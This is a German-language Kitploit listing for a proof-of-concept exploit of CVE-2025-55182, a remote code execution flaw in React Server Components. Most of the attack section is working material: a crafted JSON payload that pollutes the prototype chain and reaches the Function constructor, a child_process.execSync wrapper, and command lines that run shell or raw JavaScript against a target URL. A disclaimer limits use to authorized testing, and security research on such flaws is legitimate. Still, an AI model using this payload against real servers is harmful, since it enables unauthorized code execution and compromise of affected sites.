Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
react-ssr-vulnerability — Dies ist ein POC-Skript für CVE-2025-55182 (React SSR RCE) | Kitploit
Tools/GitHubGitHub/darker-ink/react-ssr-vulnerability
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubdarker-ink/react-ssr-vulnerability

react-ssr-vulnerability

Dies ist ein POC-Skript für CVE-2025-55182 (React SSR RCE)

Repository anzeigen
vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55182 – RCE-POC für React Server Components

Dieser POC dient ausschließlich Bildungs- und Sicherheitsforschungszwecken. Diese Schwachstelle wurde in den neuesten Versionen der betroffenen Pakete gepatcht. Verwenden Sie dieses Tool nur auf Systemen, die Ihnen gehören oder für die Sie ausdrückliche Erlaubnis zum Testen haben. Ich hafte nicht für rechtliche Schritte gegen Sie.

Payload-Konstruktion

Der Exploit erstellt ein speziell konstruiertes JSON-Objekt, das die Prototypenkette von JavaScript missbraucht:

root@kitploit:~
{
  "then": "$1:__proto__:then",           // Verschmutzt die Prototypenkette
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": jsCode,                    // Injizierter bösartiger Code
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

Befehlseinkapselung

Der POC unterstützt zwei Modi:

Standardmodus (Standard):

root@kitploit:~
process.mainModule.require("child_process").execSync("IHR_BEFEHL");

Kapselt Shell-Befehle zur Ausführung über Node.js child_process.

Raw-Modus (--raw-Flag):

root@kitploit:~
// Führt beliebiges JavaScript direkt aus

Ermöglicht die direkte Ausführung von JavaScript-Code ohne Shell-Befehlseinkapselung.

Verwendung

Ausführung eines einfachen Befehls

root@kitploit:~
bun run index.ts <befehlsdatei> <ziel_url>

Beispiel:

root@kitploit:~
# Eine Befehlsdatei erstellen
echo "whoami" > cmd.txt

# Gegen verwundbaren Endpunkt ausführen
bun run index.ts cmd.txt http://localhost:3000

Raw-JavaScript-Modus

root@kitploit:~
bun run index.ts --raw <js_datei> <ziel_url>

Beispiel:

root@kitploit:~
# JavaScript-Payload erstellen
echo "require('fs').writeFileSync('/tmp/pwned.txt', 'RCE Success')" > payload.js

# Roh-JavaScript ausführen
bun run index.ts --raw payload.js http://localhost:3000

Argumente

  • <dateipfad>: Pfad zur Datei, die den Befehl oder JavaScript-Code enthält
  • <ziel_url>: URL des React Server Function-Endpunkts
  • --raw: (Optional) Führt rohes JavaScript anstelle von Shell-Befehlen aus

Zuschreibung

Entdeckt von: Lachlan Davidson
Offengelegt von: Das React-Team & Meta Security

Referenzen

  • Offizielles React-Sicherheitsbulletin
  • CVE-2025-55182
Tool herunterladen